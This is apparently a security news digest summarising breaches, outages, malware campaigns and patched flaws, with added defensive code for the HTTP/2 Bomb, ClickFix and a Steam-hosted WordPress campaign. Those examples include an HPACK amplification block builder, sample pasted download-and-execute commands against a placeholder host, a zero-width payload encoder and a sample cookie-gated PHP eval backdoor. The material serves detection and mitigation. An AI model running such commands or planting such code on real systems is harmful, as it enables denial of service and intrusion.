Insights, Guides & Product Strategy

UN food agency discloses breach affecting 600,000 Gaza households
The United Nations’ World Food Programme disclosed a cyberattack on its Gaza self-registration platform, potentially exposing the personal data of about 600,000 Palestinian households, including names, IDs, phone numbers, and registration locations. The platform is temporarily suspended as security measures are strengthened; beneficiaries are advised to ignore suspicious requests, and aid distribution continues while the investigation proceeds.

Microsoft Blames Caching Issue for Unexpected Windows Driver Updates
Microsoft fixed a misconfiguration in the Windows Update caching service that temporarily dropped device enrollment data, causing some Windows devices with auto-update restrictions to install driver updates without notice. The affected drivers were Microsoft-approved and posed no security risk. The issue reportedly affected tens of thousands of devices and could disrupt peripherals, but has been resolved with an updated service cache and enrollment status, and a review to prevent recurrence.

French and Spanish Authorities Dismantle Fake ID Marketplace Used by Migrant Smugglers
French and Spanish authorities have dismantled an online marketplace selling forged identity and administrative documents to migrant-smuggling networks across the European Union. In Alicante, on May 27, a suspect was arrested and document-production equipment along with about 800 counterfeit European IDs were seized from an apartment rented under a false name. The platform allegedly supplied forged documents to help smugglers evade border controls, fraudulently obtain residence rights, and move within the Schengen Area. Europol says document fraud underpins migrant smuggling, a concern reflected in the EU’s new European Centre Against Migrant Smuggling (ECAMS) and the 2025 EU Serious and Organised Crime Threat Assessment, which call for stronger intelligence sharing and cross-border investigations.

Chinese Hackers Use New Atlas RAT Malware in European Cyberattacks
TA4922, a Chinese-speaking cybercrime group, has expanded from East Asia into Europe, targeting Germany, Italy, the United Kingdom, and South Africa with the Atlas RAT and a broader set of loaders. The operation is financially motivated but shows potential for surveillance, delivering payloads via tailored phishing lures and messaging apps such as WhatsApp, LINE, and Teams. Atlas RAT provides capabilities including file theft, keylogging, screen and webcam recording, and stealth features, while RomulusLoader, SilentRunLoader, and Winos4.0 (ValleyRAT) enable further payloads and remote access. Proofpoint notes TA4922 conducts more unique campaigns than any other tracked actor, with high tempo and diverse objectives that could attract espionage groups.

New HTTP/2 Bomb DoS Attack Crashes Web Servers in Under a Minute
A new DoS technique dubbed HTTP/2 Bomb can crash major web servers in seconds from a single machine by combining HPACK header-compression amplification (small compressed header blocks that decode into very large header lists) with HTTP/2 flow-control stalling, Slowloris-style, so that the decoded headers pile up in server memory. Discovered by Calif researchers using OpenAI's Codex, it can exhaust tens of gigabytes of RAM within seconds over a 100 Mbps link: in tests, Envoy hit 32 GB in about 10 seconds, Apache httpd in about 18 seconds, and Nginx and IIS (64 GB RAM) in about 45 seconds each. Patches exist for nginx (1.29.8, via its max_headers limit) and Apache httpd (mod_http2 2.0.41, CVE-2026-49975); patches for IIS, Envoy, and Pingora are not yet available. Mitigations include disabling HTTP/2 where feasible or placing a proxy or firewall in front that enforces hard header-count limits. PoC exploits are public, and full technical details will be disclosed at the Real World AI Security conference.
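The following is an added example, not the researchers' PoC or any server's code: a toy HPACK (RFC 7541) decoder that enforces the hard header-count and header-list-size limit recommended above, run against a constructed header block in which one 4000-byte literal is pushed into the dynamic table and then referenced by 1000 one-byte indexed fields. It shows why a few kilobytes on the wire decode to megabytes and how an early limit check cuts the block off. Huffman strings and most of the static table are omitted, and the "x-pad" header name is an assumption for the demo.

```python
# Added example, not the researchers' PoC or any server's code: a toy HPACK
# (RFC 7541) decoder that enforces the hard header-count / header-list-size
# limit recommended above, run against a constructed header block in which one
# 4000-byte literal is pushed into the dynamic table and then referenced by
# 1000 one-byte indexed fields. Huffman strings and most of the static table
# are omitted; the "x-pad" header name is an assumption for the demo.

STATIC_TABLE = {1: (b":authority", b""), 2: (b":method", b"GET"),
                4: (b":path", b"/"), 7: (b":scheme", b"https")}
STATIC_SIZE = 61       # RFC 7541 static table has 61 entries; dynamic ones start at 62
ENTRY_OVERHEAD = 32    # RFC 7541 section 4.1 per-entry size accounting


class HeaderLimitExceeded(Exception):
    """Raised as soon as the decoded block exceeds the configured limits."""


def _read_int(data, pos, prefix_bits):
    """Section 5.1 integer: N-bit prefix, then 7-bit continuation bytes."""
    mask = (1 << prefix_bits) - 1
    value, pos = data[pos] & mask, pos + 1
    if value < mask:
        return value, pos
    shift = 0
    while True:
        b, pos = data[pos], pos + 1
        value += (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return value, pos


def _encode_int(value, prefix_bits, flags):
    """Inverse of _read_int; `flags` holds the pattern bits above the prefix."""
    mask = (1 << prefix_bits) - 1
    if value < mask:
        return bytes([flags | value])
    out, value = bytearray([flags | mask]), value - mask
    while value >= 128:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    out.append(value)
    return bytes(out)


def _read_string(data, pos):
    if data[pos] & 0x80:
        raise ValueError("Huffman-coded strings are outside this toy's scope")
    length, pos = _read_int(data, pos, 7)
    return bytes(data[pos:pos + length]), pos + length


def decode_header_block(block, max_headers=100, max_list_bytes=16384, table_size=4096):
    """Decode an HPACK block, aborting the moment either limit is crossed."""
    dynamic, dyn_bytes = [], 0        # newest first: index 62 is dynamic[0]
    headers, list_bytes = [], 0
    pos = 0

    def lookup(idx):
        if idx <= STATIC_SIZE:
            return STATIC_TABLE[idx]  # KeyError for static entries the toy omits
        return dynamic[idx - STATIC_SIZE - 1]

    def emit(name, value):
        nonlocal list_bytes
        headers.append((name, value))
        list_bytes += len(name) + len(value) + ENTRY_OVERHEAD
        if len(headers) > max_headers or list_bytes > max_list_bytes:
            raise HeaderLimitExceeded(f"{len(headers)} headers, {list_bytes} bytes")

    while pos < len(block):
        first = block[pos]
        if first & 0x80:                    # indexed field: 1 byte on the wire
            idx, pos = _read_int(block, pos, 7)
            emit(*lookup(idx))
        elif first & 0x40:                  # literal with incremental indexing
            idx, pos = _read_int(block, pos, 6)
            name, pos = (lookup(idx)[0], pos) if idx else _read_string(block, pos)
            value, pos = _read_string(block, pos)
            emit(name, value)
            dynamic.insert(0, (name, value))
            dyn_bytes += len(name) + len(value) + ENTRY_OVERHEAD
            while dyn_bytes > table_size:   # evict oldest entries
                n, v = dynamic.pop()
                dyn_bytes -= len(n) + len(v) + ENTRY_OVERHEAD
        elif first & 0x20:                  # dynamic table size update: ignored
            _, pos = _read_int(block, pos, 5)
        else:                               # literal without / never indexed
            idx, pos = _read_int(block, pos, 4)
            name, pos = (lookup(idx)[0], pos) if idx else _read_string(block, pos)
            value, pos = _read_string(block, pos)
            emit(name, value)
    return headers


def build_amplified_block(value_len=4000, refs=1000, name=b"x-pad"):
    """Constructed input: one big literal into the dynamic table, then `refs` index hits."""
    literal = (_encode_int(0, 6, 0x40)                 # 0x40: new name, add to table
               + _encode_int(len(name), 7, 0) + name
               + _encode_int(value_len, 7, 0) + b"A" * value_len)
    return literal + _encode_int(STATIC_SIZE + 1, 7, 0x80) * refs   # 0xBE each


def amplification_ratio(block):
    """Decoded header bytes per wire byte, with the limits effectively disabled."""
    headers = decode_header_block(block, max_headers=10**9, max_list_bytes=10**12)
    return sum(len(n) + len(v) for n, v in headers) / len(block)


def within_limits(block, **limits):
    """True if the block decodes under the given limits, False if it was cut off."""
    try:
        decode_header_block(block, **limits)
        return True
    except HeaderLimitExceeded:
        return False
```

With the limits disabled, the constructed 5,010-byte block decodes to about 4 MB of headers (a ratio near 800:1) for a single stream; with the default limits the decoder gives up after a handful of headers, which is the effect a front-end header-count limit has on the server behind it. A real implementation should also bound the per-connection total across stalled streams, since the attack holds many of them open at once.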

CISA warns of active attacks exploiting Android, Linux bugs
CISA warns of active exploitation of two high-severity bugs: CVE-2025-48595 in Android (affecting Android 14–16; exploits require no user interaction; limited in-the-wild activity; patched in June 2026) and CVE-2022-0492 in the Linux kernel (cgroups v1; local privilege escalation and possible container escape; patches available for multiple kernel versions). Federal agencies must apply updates by June 5, 2026, and KEV serves as a warning to critical infrastructure and large organizations; neither flaw is currently flagged as ransomware-exploited.

What 345 Days of Untested Exposure Looks Like at a Bank
Annual penetration testing creates a 345-day gap of unvalidated exposure in modern banks, a risk highlighted by recent breaches and threat reports. A real-world finding shows a vendor-hosted mortgage portal exposing tenant data through an unauthenticated API, enabling possible fraudulent loan submissions. Regulators already expect testing to follow change, not just on a yearly cadence, making continuous external testing the recommended remedy to close the security gap in financial services.

Acer working to patch max severity zero-days in Wave 7 routers
Acer is patching two critical zero-day vulnerabilities in its Wave 7 mesh routers (firmware 1.01.000055 or earlier). CVE-2026-49200 could allow unauthenticated remote access to plaintext credentials stored in log archives via the acer_cgi.log file, while CVE-2026-49201 stems from a hardcoded AES key in upload.cgi that could enable persistent backdoor access. Patches are not yet available, but Acer says fixes are planned for deployment by the end of June 2026. Until then, users should disable remote management or restrict Internet remote access to trusted IPs and follow the firmware-update steps once updates are released.

Police dismantle 9 crime groups in illegal streaming crackdown
European and international law enforcement have dismantled nine organized crime groups behind illegal streaming in Operation KRATOS 2, coordinated by Bulgaria with Europol and spanning 13 countries. The seven-month crackdown led to 29 arrests, 86 identified suspects, 148 house searches, and ongoing investigations (72), with authorities removing more than 27,000 illegal streaming URLs and flagging hundreds of thousands of infringing items (including 18,000 IPs and 4,370 domains). Investigators say the networks separated consumer sites from hosting servers to evade detection, targeting the wider criminal ecosystem and warning users of cybersecurity risks such as malware and data theft. The operation follows earlier anti-piracy efforts including KRATOS in 2024, Operation Switch Off, and CINEMAGOAL.

Google Adds Android Protection Against AI Deepfake Scam Calls
Google announces a new Android feature, “fake call detection,” to counter AI deepfake scam calls on Android 12+ (starting with Pixel), enabled by default. The system uses Phone by Google, Contacts, and Google Messages with RCS to automatically verify calls via a real-time, encrypted signal; if no signal is received, the recipient’s device pings the caller’s actual device to confirm, and a warning appears if the call isn’t genuine. The feature addresses spoofed numbers and voice cloning, highlighting that caller ID is no longer reliable and advising users to use Phone by Google as their default dialer. This rollout expands Android’s in-call scam protections, with prior expansion to banking apps, amid FTC and INTERPOL warnings about impersonation fraud.

VS Code zero-day lets hackers steal GitHub tokens in one click
Security researchers disclosed a Visual Studio Code zero-day that lets attackers steal GitHub OAuth tokens with a single click by abusing github.dev. A proof-of-concept shows an attacker using a malicious extension, loaded through VS Code's webview, to capture the token and gain full access to every repository the victim can reach. There is no patch or CVE yet; users should mitigate by clearing cookies and on-device data for github.dev and by treating unexpected extension sign-in prompts with suspicion. The researchers went public after raising concerns about Microsoft's security response process.

Over 116,000 Minecraft Systems Infected in WeedHack Malware Campaign
A large-scale WeedHack malware campaign has infected over 116,000 Minecraft systems since January, spreading through malicious mods, clients, and utilities promoted on YouTube and via SEO poisoning. WeedHack operates as a malware-as-a-service, offering a dashboard to view stolen data and a payload builder, with a free tier that steals session IDs, cookies, and passwords across multiple apps and browsers, plus paid tiers adding remote access, keylogging, webcam access, and file management. The campaign relies on more than 240 distribution URLs and 3,820 unique malicious JAR files, with victims mainly in the United States, Germany, India, and the UK. Many clients appear to be teenagers or young adults who use WeedHack’s tools to harass others. The article urges Minecraft players to download mods only from official sources and to consider the Minecraft Marketplace for safer alternatives.

AI-built ransomware toolkit automates EDR evasion, AD discovery
An AI-built ransomware toolkit automates Active Directory discovery and evasion of endpoint detection and response (EDR) tools, accelerating cybercrime. The framework employs multiple AI agents to develop, test, and refine modular Windows payloads with encryption and evasion techniques, using components like Cobalt Strike profiles, a Telegram-based C2, a Python payload loader, and a Cloudflare front-end. Sophos says the tool has been tested against EDRs from Sophos, CrowdStrike, and Microsoft, and notes the workflow is human-driven despite AI involvement. While it may resemble a red-team framework, researchers confirm it is used for criminal ransomware activity, with AI speeding up development rather than operating autonomously in victims’ environments.

Microsoft Exchange Online outage causes email delays, failures
Microsoft is investigating a widespread Exchange Online outage impacting mail flow in North America and Germany, causing significant email delays and delivery failures. The incident (EX1331830) was first acknowledged at 10:33 ET as engineers review reports to determine the root cause and next steps, with some messages remaining undelivered for over an hour. This disruption affects users’ ability to send and receive email.

CISA flags two-year-old Oracle flaw as actively exploited in attacks
CISA has classified the two-year-old Oracle WebLogic Server flaw CVE-2024-21182 as actively exploited and added it to the Known Exploited Vulnerabilities catalog. Federal agencies were ordered to patch WebLogic servers by June 4, 2026, under BOD 22-01, with a strong urging for private-sector defenders to patch promptly. The flaw affects WebLogic versions 12.2.1.4.0 and 14.1.1.0.0 and can be exploited remotely by unauthenticated attackers, potentially giving access to sensitive data or full control of the server. With about 1,592 WebLogic servers exposed online according to Shodan, the guidance emphasizes applying vendor mitigations or discontinuing the product if mitigations are unavailable.

Google fixes one actively exploited Android zero-day, 124 flaws
Google’s June 2026 Android security patches fix 124 vulnerabilities, including an actively exploited zero-day (CVE-2025-48595) that can enable remote code execution and privilege escalation on Android 14+. The updates also address 18 critical flaws across System, Framework, and Qualcomm components and are released in two patch levels (2026-06-01 and 2026-06-05). Pixel devices will receive the updates first, with other OEMs likely to take longer. The patching continues a trend of prior zero-days such as CVE-2025-48633, CVE-2025-48572, and CVE-2026-21385 being addressed in earlier updates.

Hackers hijack thousands of sites for ClickFix and FakeUpdate attacks
Researchers link the DriveSurge group to massive campaigns that hijack thousands of sites to deliver malware via ClickFix and FakeUpdates lures. Using the open-source traffic distribution system zTDS, the group fingerprints visitors, tailors the lure to each one, and redirects them to malicious payloads, including fake browser updates and PowerShell commands the victim is tricked into running. The operation, which also targets macOS, sells access on a pay-per-install (PPI) basis like an initial access broker and relies on dozens of malicious injection domains. Users are advised to install updates only through the application's own update settings and to ignore update prompts that appear on web pages.
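As an added example (not DriveSurge tooling or any vendor's detection rule), the block below flags the endpoint pattern a ClickFix lure leaves behind: the victim pastes the lure's command into the Win+R box or a terminal, so the interpreter is spawned by an interactive parent (explorer.exe, Terminal) with a fetch-and-execute one-liner, often with a hidden window. The event field names follow the Sysmon process-creation style and the sample events are constructed for this example; both are assumptions, not real telemetry.

```python
# Added example, not DriveSurge tooling or any vendor's detection rule: flag
# the endpoint pattern a ClickFix lure produces. The victim pastes the lure's
# command into the Win+R box (or a terminal on macOS), so the interpreter is
# spawned by an interactive parent with a fetch-and-execute one-liner. Event
# field names follow the Sysmon process-creation style and the sample events
# are constructed for this example; both are assumptions, not real telemetry.
import json
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "bash", "zsh", "sh"}
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2"}

# Remote fetch + execute markers; \b keeps "iex" from matching inside other words.
FETCH_EXEC = re.compile(
    r"\b(iwr|iex|invoke-webrequest|invoke-restmethod|invoke-expression|downloadstring|downloadfile)\b"
    r"|\bmshta\s+https?://"
    r"|\bcurl\b[^|]*\|\s*(ba|z)?sh\b"
    r"|\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    re.IGNORECASE,
)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.IGNORECASE)


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1].rsplit("/", 1)[-1]


def score_event(event):
    """Return (score, reasons) for one process-creation event dict."""
    image, parent = _basename(event.get("Image", "")), _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    score, reasons = 0, []
    if image in INTERPRETERS and parent in INTERACTIVE_PARENTS:
        score, reasons = score + 2, reasons + [f"{image} spawned by interactive parent {parent}"]
    if FETCH_EXEC.search(cmd):
        score, reasons = score + 2, reasons + ["fetch-and-execute in command line"]
    if HIDDEN_WINDOW.search(cmd):
        score, reasons = score + 1, reasons + ["hidden window requested"]
    return score, reasons


def detect_clickfix(lines, threshold=4):
    """Parse JSON-per-line events and return those scoring at or above threshold."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        event = json.loads(line)
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append({"cmd": event.get("CommandLine", ""), "score": score, "reasons": reasons})
    return hits


# Constructed sample events: two ClickFix-style pastes, one benign admin
# script, one macOS Terminal paste. example.invalid is a reserved TLD.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/u | iex"'},
    {"Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "mshta https://example.invalid/update.hta"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "powershell -File C:\\Scripts\\inventory.ps1"},
    {"Image": "/bin/bash",
     "ParentImage": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "CommandLine": 'bash -c "curl -fsSL https://example.invalid/fix.sh | bash"'},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for hit in detect_clickfix(SAMPLE_LOG.splitlines()):
        print(hit["score"], hit["cmd"], "; ".join(hit["reasons"]))
```

The scoring deliberately requires two independent signals (interactive parent plus fetch-and-execute, or one of those plus a hidden window) before alerting, so a scheduled PowerShell script started by svchost.exe scores zero while the three pasted one-liners cross the threshold. On Windows the RunMRU registry key keeps a history of Win+R entries, which is a useful place to confirm a hit during triage.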

WordPress malware campaign hides payloads in Steam profiles
GoDaddy researchers warn of a WordPress malware campaign that has infected nearly 2,000 sites since mid-2025 by embedding payloads in Steam Community profile comments. The attacker uses invisible Unicode characters to encode a payload that constructs a URL to a malicious JavaScript script, hiding the C2 channel on Steam to blend with legitimate traffic. The final stage delivers a backdoor that accepts base64-encoded PHP code via POST when a specific authentication cookie is present. Potential infection vectors include stolen admin credentials, compromised FTP/SFTP, vulnerable plugins/themes, or supply-chain compromises. Defense guidance includes watching for Steam URLs, suspicious JavaScript injections, outbound connections to Steam, and indicators like invisible characters or unusual cached entries; responders should restore from a known-good backup or perform thorough manual cleanup to prevent reinfection.
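As an added example (not GoDaddy's tooling or the campaign's own code), the block below implements two of the checks the guidance above calls for: it scans text for long runs of invisible Unicode characters and decodes such a run back into bytes, and it applies a crude source check for the cookie-gated base64/POST/eval backdoor shape. The bit mapping (U+200B for 0, U+200C for 1), the sample profile comment and the sample PHP snippets are constructed for this example; the page does not describe the campaign's actual encoding.

```python
# Added example, not GoDaddy's tooling or the campaign's own code: scan text
# for the invisible-character indicator the write-up describes, decode a run
# of zero-width characters back into bytes, and apply a crude source check
# for the cookie-gated base64/POST/eval backdoor shape. The bit mapping
# (U+200B = 0, U+200C = 1), the sample comment and the sample PHP are
# constructed for this example; the page does not describe the real encoding.
import re

INVISIBLE = {"\u200b": "ZERO WIDTH SPACE", "\u200c": "ZERO WIDTH NON-JOINER",
             "\u200d": "ZERO WIDTH JOINER", "\u2060": "WORD JOINER",
             "\ufeff": "ZERO WIDTH NO-BREAK SPACE", "\u034f": "COMBINING GRAPHEME JOINER"}
# Emoji sequences legitimately use a ZWJ or two; eight in a row is not text.
RUN = re.compile("[" + "".join(INVISIBLE) + "]{8,}")


def find_invisible_runs(text):
    """Return (offset, length, code points present) for each suspicious run."""
    runs = []
    for m in RUN.finditer(text):
        points = sorted({f"U+{ord(c):04X}" for c in m.group()})
        runs.append((m.start(), m.end() - m.start(), points))
    return runs


def encode_zero_width(payload, zero="\u200b", one="\u200c"):
    """Hide bytes as invisible bits, MSB first, eight characters per byte (constructed scheme)."""
    return "".join(one if (b >> i) & 1 else zero
                   for b in payload for i in range(7, -1, -1))


def decode_zero_width(run, zero="\u200b", one="\u200c"):
    """Inverse of encode_zero_width; characters outside the two symbols are skipped."""
    bits = "".join("1" if c == one else "0" for c in run if c in (zero, one))
    usable = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def extract_hidden_payloads(text):
    """Decode every suspicious run found in text."""
    return [decode_zero_width(text[off:off + ln]) for off, ln, _ in find_invisible_runs(text)]


# All four must be present for the backdoor shape the article describes.
BACKDOOR_MARKERS = [r"\$_COOKIE\[", r"base64_decode\s*\(", r"\$_POST\[", r"\beval\s*\("]


def looks_like_cookie_gated_backdoor(php_source):
    return all(re.search(p, php_source) for p in BACKDOOR_MARKERS)


# Constructed samples: a profile comment hiding a script URL, and two PHP snippets.
SAMPLE_COMMENT = "gg well played " + encode_zero_width(b"https://cdn.example.invalid/a.js") + " :)"
SAMPLE_BACKDOOR = ('<?php if (isset($_COOKIE["auth"]) && $_COOKIE["auth"] === "k") '
                   '{ eval(base64_decode($_POST["c"])); }')
SAMPLE_BENIGN = '<?php echo htmlspecialchars(base64_decode($_POST["c"] ?? ""));'
```

Run over fetched Steam Community comments or cached HTML, the run finder points at exactly the text a reviewer cannot see in a browser; the decoder is only meaningful once the attacker's mapping is known, so in practice the alert is the run itself, not the decoded bytes. The PHP check is a triage aid, not a replacement for the full restore-from-backup the guidance recommends.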

Microsoft confirms outage affecting MFA, My Sign-Ins platform
Microsoft confirmed an ongoing outage affecting users trying to set up Multi-Factor Authentication and access mysignins.microsoft.com, with reports of 504 Gateway Timeout errors. The company has switched to alternate infrastructure to mitigate the impact, is monitoring service health, and is exploring further mitigation options; the affected regions have not been specified, and the incident began around 5:00 AM ET.

Microsoft fixes KB5089549 Windows security update install issues
Microsoft has resolved the Windows 11 May 2026 security update install failures (KB5089549) caused by insufficient free space on the EFI System Partition, which produced 0x800f0922 errors and rollback messages. The fix is included in the KB5089573 preview cumulative update and will be delivered to all users with the June Patch Tuesday updates; users should install the latest update to avoid workarounds. For those who cannot install the May 26, 2026 updates yet, Known Issue Rollback provides a mitigation, and IT admins can deploy rollback via Group Policy.